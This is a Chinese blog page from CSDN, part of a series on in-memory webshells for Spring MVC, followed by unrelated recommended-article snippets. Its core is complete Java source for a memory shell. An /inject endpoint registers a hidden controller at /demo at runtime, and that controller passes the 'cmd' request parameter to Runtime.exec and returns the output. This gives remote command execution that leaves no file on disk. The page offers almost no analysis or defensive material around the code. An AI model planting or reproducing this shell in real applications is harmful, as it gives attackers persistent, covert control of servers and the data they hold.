Conntroller内存马详解(3)

最新推荐文章于 2024-07-31 00:00:00 发布
最新推荐文章于 2024-07-31 00:00:00 发布
阅读量390 收藏
点赞数 3
文章标签: 网络 安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80520893/article/details/138129944
版权

内存马

package com.naihe.controller;

import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.ResponseBody;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import org.springframework.web.servlet.mvc.condition.PatternsRequestCondition;
import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;

import javax.servlet.http.HttpServletRequest;
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.lang.reflect.Method;

@Controller
public class Demo {
    @ResponseBody
    @RequestMapping(value = "/inject", method = RequestMethod.GET)
    public void inject() throws NoSuchMethodException {
        // 1. 利用spring内部方法获取context
        WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
        // 2. 从context中获得 RequestMappingHandlerMapping 的实例
        RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);

        // 3. 通过反射获得自定义 controller 中的 Method 对象
        Method method = InjectToController.class.getMethod("test");

        // 4. 定义访问 controller 的 URL 地址
        PatternsRequestCondition url = new PatternsRequestCondition("/demo");

        // 5. 定义允许访问 controller 的 HTTP 方法(GET/POST)
        RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();

        // 6. 在内存中动态注册 controller
        RequestMappingInfo info = new RequestMappingInfo(url, ms, null, null, null, null, null);

        InjectToController injectToController = new InjectToController();
        mappingHandlerMapping.registerMapping(info, injectToController, method);
    }
    @ResponseBody
    public class InjectToController {
        public InjectToController(){
        }
        public String test() throws Exception {
            // 获取request
            HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest();

            InputStream is = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
            InputStreamReader isr = new InputStreamReader(is, "UTF-8");
            BufferedReader br = new BufferedReader(isr);
            String str = "";
            String line = "";

            while ((line = br.readLine())!=null){
                str+=line;
            }
            is.close();
            br.close();
            return str;
        }
    }
}

效果

网安星星
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
thinkphp6 通过命令行快速生成多应用模块报 【Command “build” is not defined.】错误的解决办法
01-07
在项目下执行如下命令 ...报如下图错误 解决办法: ...文档里说: 所以我命通过命令安装扩展: ...composer require topthink/think-multi-app 出现如下图说明安装成功了 ...Successed 出现这个说明大功告成,可以开始你的多...
Knx ATmega128A Dimmer 2.0_PWMLED_knx_dimmer_LED_
09-30
5. **ir_conntroller.c**:红外控制器代码,可能用于接收遥控器发出的命令。 6. **lcd_graf.c**:图形液晶显示器(LCD)的驱动代码,用于显示设备状态和用户界面。 7. **bcd.c**:二进制编码十进制(BCD)转换代码...
UIAlertConntroller
feiyuyuan_9257的博客
09-06 397
默认样式 UIAlertController *alertController = [UIAlertController alertControllerWithTitle:@"标题" message:@"这个是UIAlertController的默认样式" preferredStyle:UIAlertControllerStyleAlert]; UIAlertAction *cancelAct
SpringMvc三层架构注解详解@Controller、@Service和@Repository
debug
11-24 11万+
1. @Controller控制层 2. @Service() 3. @Repository持久层 springvmc采用经典的三层分层控制结构,在持久层,业务层和控制层分别采用@Repository、@Service、@Controller对分层中的类进行注解,而@Component对那些比较中立的类进行注解 1. @Controller控制层 @Controller用于标记在一个类上...
SpringMVC Controller介绍
Hi, Sun
12-25 666
SpringMVC Controller介绍     来自 http://haohaoxuexi.iteye.com/blog/1753271   博客分类:  SpringMVC SpringMVCModelAttributeSessionAttributesControllerRequestMapping    SpringMVC Controller...
@Controller和@RestController的区别?
热门推荐
刚刚
05-08 20万+
@Controller和@RestController的区别? 官方文档: @RestController is a stereotype annotation that combines @ResponseBody and @Controller. 意思是: @RestController注解相当于@ResponseBody + @Controller合在一起的作用。 1)
ApiController源码
极客神殿
05-27 1264
// Copyright (c) .NET Foundation. All rights reserved. // Licensed under the Apache License, Version 2.0. See License.txt in the project root for license information. using System.Collections.Generic...
@Controller和@RestConntroller区别
weixin_60337474的博客
09-23 493
@RestController注解相当于@ResponseBody + @Controller 合在一起的作用。 @RestController public class JSONController {} @Controller @ResponseBody public class JSONController {} 1)如果只是使用@RestController注解Controller,则Controller中的方法无法返回jsp页面,配置的视图解析器InternalResourceV...
RestController和Controller的区别
灰灰爱姐姐
05-21 1万+
官方文档:A convenience annotation that is itself annotated with @Controller and @ResponseBody.意思是:@RestController注解相当于@ResponseBody + @Controller合在一起的作用。1)如果只是使用@RestController注解Controller,则Controller中的方法...
@Controller和@RestController的区别
qq_39954678的博客
10-21 5455
文章汇总 ❖❖1、 官方文档: @RestController is a stereotype annotation that combines @ResponseBody and @Controller. 意思是: @RestController注解相当于@ResponseBody + @Controller合在一起的作用。 1)如果只是使用@RestController
SpringMVC中的@Controller和@RequestMapping到底什么鬼?
weixin_30846599的博客
05-16 5245
1.1 @Controller是什么 首先看个例子: @Controller @RequestMapping("/blog") public class BlogController { @RequestMapping("/index") public ModelAndView index(HttpServletRequest request){ M...
Linux网络工具“瑞士军刀“集合
分享不一样的技术,与你一起共同成长!
07-26 378
下面结合之前的一些使用经验为大家介绍一下一些经典应用场景下,这个网络命令工具如何使用的。例如怎么查看当前服务器监听哪些端口、连接目标主机端口情况如何?平常我们在进行Linux服务器相关运维的时候,总会遇到一些网络相关的问题。我们可以借助这些小巧、功能强悍的工具帮助我们排查问题、解决问题...
计算机网络—电路、分组、报文交换—图文详解
最新发布
喻师傅的学习笔记
07-31 433
计算机网络—三种交换方式图文详解
第三周:网络应用(上)
Vincent_Zhang233的博客
07-26 252
一、网络应用(层)内容概述我们已经知道,Internet的体系结构是符合TCP/IP协议栈的,而“应用层”就在这个协议的最上层。
网络安全在2024好入行吗?
2401_84466225的博客
07-29 532
024年的今天,慎重进入网安行业吧,目前来说信息安全方向的就业对于学历的容忍度比软件开发要大得多,还有很多高中被挖过来的大佬。
S5730举例
jjjxxxhhh123的博客
07-27 974
例子: 假设在校园网络中,某些交换机之间存在多个连接(可能是多个光纤),如果没有STP,这些多个连接可能导致数据包在网络中无限制地传输,形成网络风暴,导致整个网络瘫痪。PIM-SM通过仅在需要时在网络中传输组播数据包,减少网络带宽的占用,提高数据传输效率。[sysname-GigabitEthernet0/0/1] ospf cost 10 // 设置接口的OSPF成本,影响路径选择。综上所述,这些网络技术和配置在大学校园网络中起到关键作用,确保网络运行高效、安全和可靠,同时满足用户的多样化需求。
Python面试题:如何使用WebSocket实现实时Web应用
bigorsmallorlarge的专栏
07-30 315
通过上述步骤,你可以使用 Django Channels 和 WebSocket 创建一个简单的实时 Web 应用。Django Channels 提供了强大的功能,使得在 Django 中实现实时功能变得更加容易。你可以在此基础上扩展,添加更多功能和复杂的逻辑。
如何合理的在conntroller层处理系统异常和业务异常,举例说明
05-30
好的,我来举个例子。 假设我们有一个UserController,其中包含一个注册用户的接口registerUser,该接口需要传入用户名和密码。为了防止用户名重复,我们需要在该接口中处理业务异常。 首先,我们可以定义一个自定义异常类,比如UserExistException,用于表示用户名已存在的异常。该类可以继承RuntimeException,因为业务异常通常都是非受检异常。 ```java public class UserExistException extends RuntimeException { public UserExistException(String message) { super(message); } } ``` 然后,在UserController中的registerUser方法中,我们可以使用try-catch语句来捕获该异常,并在发生异常时返回给前端一个友好的提示信息。 ```java @RestController public class UserController { @Autowired private UserService userService; @PostMapping("/register") public String registerUser(@RequestParam("username") String username, @RequestParam("password") String password) { try { userService.registerUser(username, password); return "注册成功"; } catch (UserExistException e) { return "用户名已存在,请重新输入"; } catch (Exception e) { return "系统繁忙,请稍后再试"; } } } ``` 最后,在UserService中的registerUser方法中,我们可以判断用户名是否已存在,如果已存在,则抛出UserExistException异常。 ```java @Service public class UserService { @Autowired private UserRepository userRepository; public void registerUser(String username, String password) { // 判断用户名是否已存在 User user = userRepository.findByUsername(username); if (user != null) { throw new UserExistException("用户名已存在"); } // 注册用户 userRepository.save(new User(username, password)); } } ``` 这样,当用户输入已存在的用户名时,UserController会捕获UserExistException异常,并返回给前端一个友好的提示信息。而当发生其它系统异常时,UserController也会返回一个友好的提示信息,避免将异常信息暴露给前端用户,提高系统的安全性和用户体验。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值